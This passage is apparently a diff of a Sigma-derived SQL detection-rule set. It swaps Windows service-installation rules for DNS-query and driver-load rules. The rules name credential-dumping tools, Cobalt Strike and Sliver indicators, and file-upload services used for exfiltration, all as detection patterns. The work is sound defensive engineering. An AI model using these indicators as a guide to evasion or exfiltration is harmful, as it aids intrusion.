"b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", "status": "experimental", - "description": "Detects service installation in suspicious folder appdata", - "author": "pH-T (Nextron Systems)", + "description": "Detects DNS queries to an \".onion\" address related to Tor routing networks", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\127.0.0.1%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\localhost%' ESCAPE '\\')) AND NOT ((ServiceName = 'Zoom Sharing Service' AND ImagePath LIKE '\"C:\\\\Program Files\\\\Common Files\\\\Zoom\\\\Support\\\\CptService.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE QueryName LIKE '%.onion%' ESCAPE '\\'" ], - "filename": "win_system_susp_service_installation_folder.yml" + "filename": "dns_query_win_tor_onion.yml" }, { - "title": "PAExec Service Installation", - "id": "de7ce410-b3fb-4e8a-b38c-3b999e2c3420", - "status": "experimental", - "description": "Detects PAExec service installation", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Regsvr32 Network Activity - DNS", + "id": "36e037c4-c228-4866-b6a3-48eb292b9955", + "status": "test", + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ "attack.execution", - "attack.t1569.002" + "attack.t1559.001", + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ServiceName LIKE 'PAExec-%' ESCAPE '\\' OR ImagePath LIKE 'C:\\\\WINDOWS\\\\PAExec-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\'" ], - "filename": "win_system_service_install_paexec.yml" + "filename": "dns_query_win_regsvr32_network_activity.yml" }, { - "title": "StoneDrill Service Install", - "id": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", + "title": "DNS Query for MEGA.io Upload Domain - Sysmon", + "id": "613c03ba-0779-4a53-8a1f-47f914a4ded3", "status": "test", - "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects DNS queries for subdomains used for upload to MEGA.io", + "author": "Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.persistence", - "attack.g0064", - "attack.t1543.003" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unlikely" + "Legitimate DNS queries and usage of Mega" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'NtsSrv' AND ImagePath LIKE '% LocalService' ESCAPE '\\')" + "SELECT * FROM logs WHERE QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\'" ], - "filename": "win_system_apt_stonedrill.yml" + "filename": "dns_query_win_mega_nz.yml" }, { - "title": "ProcessHacker Privilege Elevation", - "id": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", + "title": "DNS HybridConnectionManager Service Bus", + "id": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", "status": "test", - "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unlikely" + "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName LIKE 'ProcessHacker%' ESCAPE '\\' AND AccountName = 'LocalSystem')" + "SELECT * FROM logs WHERE (QueryName LIKE '%servicebus.windows.net%' ESCAPE '\\' AND NewProcessName LIKE '%HybridConnectionManager%' ESCAPE '\\')" ], - "filename": "win_system_susp_proceshacker.yml" + "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml" }, { - "title": "Sysmon Crash", - "id": "4d7f1827-1637-4def-8d8a-fd254f9454df", + "title": "Potential SocGholish Second Stage C2 DNS Query", + "id": "70761fe8-6aa2-4f80-98c1-a57049c08e66", "status": "experimental", - "description": "Detects application popup reporting a failure of the Sysmon service", - "author": "Tim Shelton", + "description": "Detects a DNS query initiated from a \"wscript\" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic", + "author": "Dusty Miller", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate domain names matching the regex pattern by chance (e.g. domain controllers dc01.company.co.uk)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Application Popup' AND EventID = '26' AND Caption = 'sysmon64.exe - Application Error')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' AND QueryName REGEXP '[a-f0-9]{4,8}\\.(?:[a-z0-9\\-]+\\.){2}[a-z0-9\\-]+')" ], - "filename": "win_system_application_sysmon_crash.yml" + "filename": "dns_query_win_malware_socgholish_second_stage_c2.yml" }, { - "title": "Eventlog Cleared", - "id": "a62b37e0-45d3-48d9-a517-90c1a1b0186b", + "title": "DNS Query for Anonfiles.com Domain - Sysmon", + "id": "065cceea-77ec-4030-9052-fc0affea7110", "status": "experimental", - "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects DNS queries for \"anonfiles.com\", which is an anonymous file upload platform often used for malicious purposes", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Rare legitimate access to anonfiles.com" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog') AND NOT (Channel IN ('System', 'Security', 'Application')))" + "SELECT * FROM logs WHERE QueryName LIKE '%.anonfiles.com%' ESCAPE '\\'" ], - "filename": "win_system_eventlog_cleared.yml" + "filename": "dns_query_win_anonymfiles_com.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - System", - "id": "487c7524-f892-4054-b263-8a0ace63fc25", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious DNS Query for IP Lookup Service APIs", + "id": "ec82e2a5-81ea-4211-a1f8-37a0286df2c2", + "status": "test", + "description": "Detects DNS queries for IP lookup services such as \"api.ipify.org\" originating from a non browser process.", + "author": "Brandon George (blog post), Thomas Patzke (rule)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.reconnaissance", + "attack.t1590" ], "falsepositives": [ - "Unknown" + "Legitimate usage of IP lookup services such as ipify API" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%set%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND (ImagePath LIKE '%environment%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%input%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((QueryName LIKE '%api.2ip.ua%' ESCAPE '\\' OR QueryName LIKE '%api.ipify.org%' ESCAPE '\\' OR QueryName LIKE '%bot.whatismyipaddress.com%' ESCAPE '\\' OR QueryName LIKE '%canireachthe.net%' ESCAPE '\\' OR QueryName LIKE '%checkip.amazonaws.com%' ESCAPE '\\' OR QueryName LIKE '%checkip.dyndns.org%' ESCAPE '\\' OR QueryName LIKE '%curlmyip.com%' ESCAPE '\\' OR QueryName LIKE '%edns.ip-api.com%' ESCAPE '\\' OR QueryName LIKE '%eth0.me%' ESCAPE '\\' OR QueryName LIKE '%freegeoip.app%' ESCAPE '\\' OR QueryName LIKE '%icanhazip.com%' ESCAPE '\\' OR QueryName LIKE '%ident.me%' ESCAPE '\\' OR QueryName LIKE '%ifconfig.io%' ESCAPE '\\' OR QueryName LIKE '%ifconfig.me%' ESCAPE '\\' OR QueryName LIKE '%ip-api.com%' ESCAPE '\\' OR QueryName LIKE '%ip.anysrc.net%' ESCAPE '\\' OR QueryName LIKE '%ip.tyk.nu%' ESCAPE '\\' OR QueryName LIKE '%ipaddressworld.com%' ESCAPE '\\' OR QueryName LIKE '%ipecho.net%' ESCAPE '\\' OR QueryName LIKE '%ipinfo.io%' ESCAPE '\\' OR QueryName LIKE '%ipof.in%' ESCAPE '\\' OR QueryName LIKE '%ipv4.icanhazip.com%' ESCAPE '\\' OR QueryName LIKE '%ipv4bot.whatismyipaddress.com%' ESCAPE '\\' OR QueryName LIKE '%ipwho.is%' ESCAPE '\\' OR QueryName LIKE '%l2.io%' ESCAPE '\\' OR QueryName LIKE '%myexternalip.com%' ESCAPE '\\' OR QueryName LIKE '%wgetip.com%' ESCAPE '\\' OR QueryName LIKE '%whatismyip.akamai.com%' ESCAPE '\\' OR QueryName LIKE '%wtfismyip.com%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\safari.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "win_system_invoke_obfuscation_via_stdin_services.yml" + "filename": "dns_query_win_susp_ipify.yml" }, { - "title": "Sliver C2 Default Service Installation", - "id": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", + "title": "Suspicious LDAP Domain Access", + "id": "a21bcd7e-38ec-49ad-b69a-9ea17e69509e", "status": "experimental", - "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "description": "Detect suspicious LDAP request from non-Windows application", + "author": "frack113", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Unknown" + "Programs that also lookup the observed domain" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[a-zA-Z]:\\\\windows\\\\temp\\\\[a-zA-Z0-9]{10}\\.exe' OR ServiceName IN ('Sliver', 'Sliver implant')))" + "SELECT * FROM logs WHERE (QueryName LIKE '\\_ldap.%' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\MsMpEng.exe%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (NewProcessName = '') OR (NewProcessName LIKE 'C:\\\\WindowsAzure\\\\GuestAgent%' ESCAPE '\\')))" ], - "filename": "win_system_service_install_sliver.yml" + "filename": "dns_query_win_susp_ldap.yml" }, { - "title": "Hacktool Service Registration or Execution", - "id": "d26ce60c-2151-403c-9a42-49420d87b5e4", + "title": "Suspicious TeamViewer Domain Access", + "id": "778ba9a8-45e4-4b80-8e3e-34a419f0b85e", "status": "test", - "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "description": "Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Unknown binary names of TeamViewer", + "Other programs that also lookup the observed domain" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036')) AND ((ServiceName LIKE '%WCESERVICE%' ESCAPE '\\' OR ServiceName LIKE '%WCE SERVICE%' ESCAPE '\\' OR ServiceName LIKE '%winexesvc%' ESCAPE '\\' OR ServiceName LIKE '%DumpSvc%' ESCAPE '\\' OR ServiceName LIKE '%pwdump%' ESCAPE '\\' OR ServiceName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceName LIKE '%cachedump%' ESCAPE '\\') OR ImagePath LIKE '%bypass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (QueryName IN ('taf.teamviewer.com', 'udp.ping.teamviewer.com') AND NOT (NewProcessName LIKE '%TeamViewer%' ESCAPE '\\'))" ], - "filename": "win_system_service_install_hacktools.yml" + "filename": "dns_query_win_susp_teamviewer.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - System", - "id": "63e3365d-4824-42d8-8b82-e56810fefa0c", + "title": "DNS Query for Ufile.io Upload Domain - Sysmon", + "id": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", + "author": "yatinwad and TheDFIRReport", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Ufile" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%(Clipboard|i%' ESCAPE '\\')" + "SELECT * FROM logs WHERE QueryName LIKE '%ufile.io%' ESCAPE '\\'" ], - "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml" + "filename": "dns_query_win_ufile_io.yml" }, { - "title": "New PDQDeploy Service - Client Side", - "id": "b98a10af-1e1e-44a7-bab2-4cc026917648", + "title": "DNS Query To Remote Access Software Domain", + "id": "4d07b1f4-cb00-4470-b9f8-b0191d48ff52", "status": "experimental", - "description": "Detects PDQDeploy service installation on the target system.\nWhen a package is deployed via PDQDeploy it installs a remote service on the target machine with the name \"PDQDeployRunner-X\" where \"X\" is an integer starting from 1\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113, Connor Martin", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate use of the tool" + "Likely with other browser software" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%PDQDeployRunner-%' ESCAPE '\\' OR ServiceName LIKE 'PDQDeployRunner-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((QueryName LIKE '%.getgo.com' ESCAPE '\\' OR QueryName LIKE '%.logmein.com' ESCAPE '\\' OR QueryName LIKE '%.ammyy.com' ESCAPE '\\' OR QueryName LIKE '%.netsupportsoftware.com' ESCAPE '\\' OR QueryName LIKE '%remoteutilities.com' ESCAPE '\\' OR QueryName LIKE '%.net.anydesk.com' ESCAPE '\\' OR QueryName LIKE '%api.playanext.com' ESCAPE '\\' OR QueryName LIKE '%.relay.splashtop.com' ESCAPE '\\' OR QueryName LIKE '%.api.splashtop.com' ESCAPE '\\' OR QueryName LIKE '%app.atera.com' ESCAPE '\\' OR QueryName LIKE '%.agentreporting.atera.com' ESCAPE '\\' OR QueryName LIKE '%.pubsub.atera.com' ESCAPE '\\' OR QueryName LIKE '%logmeincdn.http.internapcdn.net' ESCAPE '\\' OR QueryName LIKE '%logmein-gateway.com' ESCAPE '\\' OR QueryName LIKE '%client.teamviewer.com' ESCAPE '\\' OR QueryName LIKE '%integratedchat.teamviewer.com' ESCAPE '\\' OR QueryName LIKE '%static.remotepc.com' ESCAPE '\\' OR QueryName LIKE '%.n-able.com' ESCAPE '\\' OR QueryName LIKE '%comserver.corporate.beanywhere.com' ESCAPE '\\' OR QueryName LIKE '%.swi-rc.com' ESCAPE '\\' OR QueryName LIKE '%.swi-tc.com' ESCAPE '\\' OR QueryName LIKE '%telemetry.servers.qetqo.com' ESCAPE '\\' OR QueryName LIKE '%relay.screenconnect.com' ESCAPE '\\' OR QueryName LIKE '%control.connectwise.com' ESCAPE '\\' OR QueryName LIKE '%express.gotoassist.com' ESCAPE '\\' OR QueryName LIKE '%authentication.logmeininc.com' ESCAPE '\\' OR QueryName LIKE '%.services.vnc.com' ESCAPE '\\' OR QueryName LIKE '%.tmate.io' ESCAPE '\\' OR QueryName LIKE '%api.parsec.app' ESCAPE '\\' OR QueryName LIKE '%parsecusercontent.com' ESCAPE '\\' OR QueryName LIKE '%remotedesktop-pa.googleapis.com' ESCAPE '\\' OR QueryName LIKE '%.logmein-gateway.com' ESCAPE '\\' OR QueryName LIKE '%secure.logmeinrescue.com' ESCAPE '\\' OR QueryName LIKE '%join.zoho.com' ESCAPE '\\' OR QueryName LIKE '%assist.zoho.com' ESCAPE '\\' OR QueryName LIKE '%.zohoassist.com' ESCAPE '\\' OR QueryName LIKE '%downloads.zohocdn.com' ESCAPE '\\' OR QueryName LIKE '%agent.jumpcloud.com' ESCAPE '\\' OR QueryName LIKE '%kickstart.jumpcloud.com' ESCAPE '\\' OR QueryName LIKE '%cdn.kaseya.net' ESCAPE '\\' OR QueryName LIKE '%relay.kaseya.net' ESCAPE '\\' OR QueryName LIKE '%license.bomgar.com' ESCAPE '\\' OR QueryName LIKE '%.beyondtrustcloud.com' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\safari.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "win_system_service_install_pdqdeploy_runner.yml" + "filename": "dns_query_win_remote_access_software_domains.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System", - "id": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", - "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "Suspicious Cobalt Strike DNS Beaconing - Sysmon", + "id": "f356a9c4-effd-4608-bbf8-408afd5cd006", + "status": "test", + "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&set%' ESCAPE '\\' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%{0}%' ESCAPE '\\' OR ImagePath LIKE '%{1}%' ESCAPE '\\' OR ImagePath LIKE '%{2}%' ESCAPE '\\' OR ImagePath LIKE '%{3}%' ESCAPE '\\' OR ImagePath LIKE '%{4}%' ESCAPE '\\' OR ImagePath LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_via_var_services.yml" + "filename": "dns_query_win_mal_cobaltstrike.yml" }, { - "title": "Vulnerable Netlogon Secure Channel Connection Allowed", - "id": "a0cb7110-edf0-47a4-9177-541a4083128a", - "status": "test", - "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", - "author": "NVISO", + "title": "Vulnerable HackSys Extreme Vulnerable Driver Load", + "id": "295c9289-acee-4503-a571-8eacaef36b28", + "status": "experimental", + "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1548" + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'NetLogon' AND EventID = '5829')" - ], - "filename": "win_system_vul_cve_2020_1472.yml" - }, - { - "title": "Volume Shadow Copy Mount", - "id": "f512acbf-e662-4903-843e-97ce4652b740", - "status": "test", - "description": "Detects volume shadow copy mount via windows event log", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", - "tags": [ - "attack.credential_access", - "attack.t1003.002" - ], - "falsepositives": [ - "Legitimate use of volume shadow copy mounts (backups maybe)." - ], - "level": "low", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-Ntfs' AND EventID = '98' AND DeviceName LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\HEVD.sys' ESCAPE '\\' OR (Hashes LIKE '%IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c46ea2e651fd5f7f716c8867c6d13594%' ESCAPE '\\') OR Imphash IN ('f26d0b110873a1c7d8c4f08fbeab89c5', 'c46ea2e651fd5f7f716c8867c6d13594'))" ], - "filename": "win_system_volume_shadow_copy_mount.yml" + "filename": "driver_load_win_vuln_hevd_driver.yml" }, { - "title": "DHCP Server Loaded the CallOut DLL", - "id": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", - "status": "test", - "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", - "author": "Dimitrios Slamaris", + "title": "WinDivert Driver Load", + "id": "679085d5-f427-4484-9f58-1dc30a7c426d", + "status": "experimental", + "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.collection", "attack.defense_evasion", - "attack.t1574.002" + "attack.t1599.001", + "attack.t1557.001" ], "falsepositives": [ - "Unknown" + "Legitimate WinDivert driver usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '1033' AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\WinDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinDivert64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NordDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lingtiwfp.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eswfp.sys%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=0604bb7cb4bb851e2168d5c7d9399087%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2e5f0e649d97f32b03c09e4686d0574f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=52f8aa269f69f0edad9e8fcdaedce276%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c0e5d314da39dbf65a2dbff409cc2c76%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=58623490691babe8330adc81cd04a663%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8ee39b48656e4d6b8459d7ba7da7438b%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=45ee545ae77e8d43fc70ede9efcd4c96%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a1b2e245acd47e4a348e1a552a02859a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2a5f85fe4609461c6339637594fa9b0a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6b2c6f95233c2914d1d488ee27531acc%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9f2fdd3f9ab922bbb0560a7df46f4342%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=d8a719865c448b1bd2ec241e46ac1c88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0ea54f8c9af4a2fe8367fa457f48ed38%' ESCAPE '\\' OR Hashes LIKE 